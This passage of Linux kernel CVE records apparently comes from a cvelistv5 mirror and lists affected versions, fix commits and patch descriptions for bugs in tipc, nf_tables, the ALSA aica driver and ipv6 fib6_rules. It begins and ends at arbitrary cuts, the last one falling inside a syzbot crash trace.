"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tipc/msg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "01cd1b7b685751ee422d00d050292a3d277652d6",
"status": "affected",
"version": "4b1761898861117c97066aea6c58f68a7787f0bf",
"versionType": "git"
},
{
"lessThan": "2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae",
"status": "affected",
"version": "64d17ec9f1ded042c4b188d15734f33486ed9966",
"versionType": "git"
},
{
"lessThan": "adbce6d20da6254c86425a8d4359b221b5ccbccd",
"status": "affected",
"version": "6da24cfc83ba4f97ea44fc7ae9999a006101755c",
"versionType": "git"
},
{
"lessThan": "42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c",
"status": "affected",
"version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
"versionType": "git"
},
{
"lessThan": "d03a82f4f8144befdc10518e732e2a60b34c870e",
"status": "affected",
"version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
"versionType": "git"
},
{
"lessThan": "614c5a5ae45a921595952117b2e2bd4d4bf9b574",
"status": "affected",
"version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
"versionType": "git"
},
{
"lessThan": "3210d34fda4caff212cb53729e6bd46de604d565",
"status": "affected",
"version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
"versionType": "git"
},
{
"lessThan": "97bf6f81b29a8efaf5d0983251a7450e5794370d",
"status": "affected",
"version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
"versionType": "git"
},
{
"status": "affected",
"version": "b2c8d28c34b3070407cb1741f9ba3f15d0284b8b",
"versionType": "git"
},
{
"status": "affected",
"version": "5489f30bb78ff0dafb4229a69632afc2ba20765c",
"versionType": "git"
},
{
"status": "affected",
"version": "436d650d374329a591c30339a91fa5078052ed1e",
"versionType": "git"
},
{
"status": "affected",
"version": "ace300eecbccaa698e2b472843c74a5f33f7dce8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tipc/msg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.19.193",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "5.4.124",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.271",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.271",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.235",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix a possible memleak in tipc_buf_append\n\n__skb_linearize() doesn\u0027t free the skb when it fails, so move\n\u0027*buf = NULL\u0027 after __skb_linearize(), so that the skb can be\nfreed on the err path."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:33.433Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/01cd1b7b685751ee422d00d050292a3d277652d6"
},
{
"url": "https://git.kernel.org/stable/c/2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae"
},
{
"url": "https://git.kernel.org/stable/c/adbce6d20da6254c86425a8d4359b221b5ccbccd"
},
{
"url": "https://git.kernel.org/stable/c/42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c"
},
{
"url": "https://git.kernel.org/stable/c/d03a82f4f8144befdc10518e732e2a60b34c870e"
},
{
"url": "https://git.kernel.org/stable/c/614c5a5ae45a921595952117b2e2bd4d4bf9b574"
},
{
"url": "https://git.kernel.org/stable/c/3210d34fda4caff212cb53729e6bd46de604d565"
},
{
"url": "https://git.kernel.org/stable/c/97bf6f81b29a8efaf5d0983251a7450e5794370d"
}
],
"title": "tipc: fix a possible memleak in tipc_buf_append",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36954",
"datePublished": "2024-05-30T15:35:48.665Z",
"dateReserved": "2024-05-30T15:25:07.080Z",
"dateUpdated": "2025-05-04T12:56:33.433Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26925 (GCVE-0-2024-26925)
Vulnerability from cvelistv5
Published
2024-04-24 21:49
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: release mutex after nft_gc_seq_end from abort path
The commit mutex should not be released during the critical section
between nft_gc_seq_begin() and nft_gc_seq_end(), otherwise, async GC
worker could collect expired objects and get the released commit lock
within the same GC sequence.
nf_tables_module_autoload() temporarily releases the mutex to load
module dependencies, then it goes back to replay the transaction again.
Move it at the end of the abort phase after nft_gc_seq_end() is called.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4b6346dc1edfb9839d6edee7360ed31a22fa6c95 Version: 23292bdfda5f04e704a843b8f97b0eb95ace1ca6 Version: b44a459c6561595ed7c3679599c5279204132b33 Version: 5d319f7a81431c6bb32eb4dc7d7975f99e2c8c66 Version: 720344340fb9be2765bbaab7b292ece0a4570eae Version: 720344340fb9be2765bbaab7b292ece0a4570eae Version: 720344340fb9be2765bbaab7b292ece0a4570eae Version: f85ca36090cbb252bcbc95fc74c2853fc792694f Version: e07e68823116563bdbc49cef185cda6f463bc534 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.900Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61ac7284346c32f9a8c8ceac56102f7914060428"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2cee2ff7f8cce12a63a0a23ffe27f08d99541494"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb769ff4e281f751adcaf4f4445cbf30817be139"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d3a58af50e46167b6f1db47adadad03c0045dae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8038ee3c3e5b59bcd78467686db5270c68544e30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a34ba4bdeec0c3b629160497594908dc820110f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d459e2ffb541841714839e8228b845458ed3b27"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26925",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:46:30.592135Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:12.845Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "61ac7284346c32f9a8c8ceac56102f7914060428",
"status": "affected",
"version": "4b6346dc1edfb9839d6edee7360ed31a22fa6c95",
"versionType": "git"
},
{
"lessThan": "2cee2ff7f8cce12a63a0a23ffe27f08d99541494",
"status": "affected",
"version": "23292bdfda5f04e704a843b8f97b0eb95ace1ca6",
"versionType": "git"
},
{
"lessThan": "eb769ff4e281f751adcaf4f4445cbf30817be139",
"status": "affected",
"version": "b44a459c6561595ed7c3679599c5279204132b33",
"versionType": "git"
},
{
"lessThan": "8d3a58af50e46167b6f1db47adadad03c0045dae",
"status": "affected",
"version": "5d319f7a81431c6bb32eb4dc7d7975f99e2c8c66",
"versionType": "git"
},
{
"lessThan": "8038ee3c3e5b59bcd78467686db5270c68544e30",
"status": "affected",
"version": "720344340fb9be2765bbaab7b292ece0a4570eae",
"versionType": "git"
},
{
"lessThan": "a34ba4bdeec0c3b629160497594908dc820110f1",
"status": "affected",
"version": "720344340fb9be2765bbaab7b292ece0a4570eae",
"versionType": "git"
},
{
"lessThan": "0d459e2ffb541841714839e8228b845458ed3b27",
"status": "affected",
"version": "720344340fb9be2765bbaab7b292ece0a4570eae",
"versionType": "git"
},
{
"status": "affected",
"version": "f85ca36090cbb252bcbc95fc74c2853fc792694f",
"versionType": "git"
},
{
"status": "affected",
"version": "e07e68823116563bdbc49cef185cda6f463bc534",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.198",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "5.15.134",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"versionStartIncluding": "6.1.56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: release mutex after nft_gc_seq_end from abort path\n\nThe commit mutex should not be released during the critical section\nbetween nft_gc_seq_begin() and nft_gc_seq_end(), otherwise, async GC\nworker could collect expired objects and get the released commit lock\nwithin the same GC sequence.\n\nnf_tables_module_autoload() temporarily releases the mutex to load\nmodule dependencies, then it goes back to replay the transaction again.\nMove it at the end of the abort phase after nft_gc_seq_end() is called."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:12.223Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/61ac7284346c32f9a8c8ceac56102f7914060428"
},
{
"url": "https://git.kernel.org/stable/c/2cee2ff7f8cce12a63a0a23ffe27f08d99541494"
},
{
"url": "https://git.kernel.org/stable/c/eb769ff4e281f751adcaf4f4445cbf30817be139"
},
{
"url": "https://git.kernel.org/stable/c/8d3a58af50e46167b6f1db47adadad03c0045dae"
},
{
"url": "https://git.kernel.org/stable/c/8038ee3c3e5b59bcd78467686db5270c68544e30"
},
{
"url": "https://git.kernel.org/stable/c/a34ba4bdeec0c3b629160497594908dc820110f1"
},
{
"url": "https://git.kernel.org/stable/c/0d459e2ffb541841714839e8228b845458ed3b27"
}
],
"title": "netfilter: nf_tables: release mutex after nft_gc_seq_end from abort path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26925",
"datePublished": "2024-04-24T21:49:23.251Z",
"dateReserved": "2024-02-19T14:20:24.194Z",
"dateUpdated": "2025-05-04T12:55:12.223Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26654 (GCVE-0-2024-26654)
Vulnerability from cvelistv5
Published
2024-04-01 08:35
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: sh: aica: reorder cleanup operations to avoid UAF bugs
The dreamcastcard->timer could schedule the spu_dma_work and the
spu_dma_work could also arm the dreamcastcard->timer.
When the snd_pcm_substream is closing, the aica_channel will be
deallocated. But it could still be dereferenced in the worker
thread. The reason is that del_timer() will return directly
regardless of whether the timer handler is running or not and
the worker could be rescheduled in the timer handler. As a result,
the UAF bug will happen. The racy situation is shown below:
(Thread 1) | (Thread 2)
snd_aicapcm_pcm_close() |
... | run_spu_dma() //worker
| mod_timer()
flush_work() |
del_timer() | aica_period_elapsed() //timer
kfree(dreamcastcard->channel) | schedule_work()
| run_spu_dma() //worker
... | dreamcastcard->channel-> //USE
In order to mitigate this bug and other possible corner cases,
call mod_timer() conditionally in run_spu_dma(), then implement
PCM sync_stop op to cancel both the timer and worker. The sync_stop
op will be called from PCM core appropriately when needed.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c Version: 198de43d758ca2700e2b52b49c0b189b4931466c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.846Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eeb2a2ca0b8de7e1c66afaf719529154e7dc60b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4206ad65a0ee76920041a755bd3c17c6ba59bba2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa39e6878f61f50892ee2dd9d2176f72020be845"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c990221681688da34295d6d76cc2f5b963e83f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d66ae0e7bb78b54e1e0525456c6b54e1d132046"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61d4787692c1fccdc268ffa7a891f9c149f50901"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e955e8a7f38a856fc6534ba4e6bffd4d5cc80ac3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c907bf56905de7d27b329afaf59c2fb35d17b04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/051e0840ffa8ab25554d6b14b62c9ab9e4901457"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26654",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:59.432754Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:42.392Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/sh/aica.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eeb2a2ca0b8de7e1c66afaf719529154e7dc60b2",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "4206ad65a0ee76920041a755bd3c17c6ba59bba2",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "aa39e6878f61f50892ee2dd9d2176f72020be845",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "8c990221681688da34295d6d76cc2f5b963e83f5",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "9d66ae0e7bb78b54e1e0525456c6b54e1d132046",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "61d4787692c1fccdc268ffa7a891f9c149f50901",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "e955e8a7f38a856fc6534ba4e6bffd4d5cc80ac3",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "3c907bf56905de7d27b329afaf59c2fb35d17b04",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
},
{
"lessThan": "051e0840ffa8ab25554d6b14b62c9ab9e4901457",
"status": "affected",
"version": "198de43d758ca2700e2b52b49c0b189b4931466c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/sh/aica.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.23"
},
{
"lessThan": "2.6.23",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.23",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: sh: aica: reorder cleanup operations to avoid UAF bugs\n\nThe dreamcastcard-\u003etimer could schedule the spu_dma_work and the\nspu_dma_work could also arm the dreamcastcard-\u003etimer.\n\nWhen the snd_pcm_substream is closing, the aica_channel will be\ndeallocated. But it could still be dereferenced in the worker\nthread. The reason is that del_timer() will return directly\nregardless of whether the timer handler is running or not and\nthe worker could be rescheduled in the timer handler. As a result,\nthe UAF bug will happen. The racy situation is shown below:\n\n (Thread 1) | (Thread 2)\nsnd_aicapcm_pcm_close() |\n ... | run_spu_dma() //worker\n | mod_timer()\n flush_work() |\n del_timer() | aica_period_elapsed() //timer\n kfree(dreamcastcard-\u003echannel) | schedule_work()\n | run_spu_dma() //worker\n ... | dreamcastcard-\u003echannel-\u003e //USE\n\nIn order to mitigate this bug and other possible corner cases,\ncall mod_timer() conditionally in run_spu_dma(), then implement\nPCM sync_stop op to cancel both the timer and worker. The sync_stop\nop will be called from PCM core appropriately when needed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:11.500Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eeb2a2ca0b8de7e1c66afaf719529154e7dc60b2"
},
{
"url": "https://git.kernel.org/stable/c/4206ad65a0ee76920041a755bd3c17c6ba59bba2"
},
{
"url": "https://git.kernel.org/stable/c/aa39e6878f61f50892ee2dd9d2176f72020be845"
},
{
"url": "https://git.kernel.org/stable/c/8c990221681688da34295d6d76cc2f5b963e83f5"
},
{
"url": "https://git.kernel.org/stable/c/9d66ae0e7bb78b54e1e0525456c6b54e1d132046"
},
{
"url": "https://git.kernel.org/stable/c/61d4787692c1fccdc268ffa7a891f9c149f50901"
},
{
"url": "https://git.kernel.org/stable/c/e955e8a7f38a856fc6534ba4e6bffd4d5cc80ac3"
},
{
"url": "https://git.kernel.org/stable/c/3c907bf56905de7d27b329afaf59c2fb35d17b04"
},
{
"url": "https://git.kernel.org/stable/c/051e0840ffa8ab25554d6b14b62c9ab9e4901457"
}
],
"title": "ALSA: sh: aica: reorder cleanup operations to avoid UAF bugs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26654",
"datePublished": "2024-04-01T08:35:19.763Z",
"dateReserved": "2024-02-19T14:20:24.144Z",
"dateUpdated": "2025-05-04T08:53:11.500Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36902 (GCVE-0-2024-36902)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fib6_rules: avoid possible NULL dereference in fib6_rule_action()
syzbot is able to trigger the following crash [1],
caused by unsafe ip6_dst_idev() use.
Indeed ip6_dst_idev() can return NULL, and must always be checked.
[1]
Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
CPU: 0 PID: 31648 Comm: syz-executor.0 Not tainted 6.9.0-rc4-next-20240417-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
RIP: 0010:__fib6_rule_action net/ipv6/fib6_rules.c:237 [inline]
RIP: 0010:fib6_rule_action+0x241/0x7b0 net/ipv6/fib6_rules.c:267
Code: 02 00 00 49 8d 9f d8 00 00 00 48 89 d8 48 c1 e8 03 42 80 3c 20 00 74 08 48 89 df e8 f9 32 bf f7 48 8b 1b 48 89 d8 48 c1 e8 03 <42> 80 3c 20 00 74 08 48 89 df e8 e0 32 bf f7 4c 8b 03 48 89 ef 4c
RSP: 0018:ffffc9000fc1f2f0 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 1a772f98c8186700
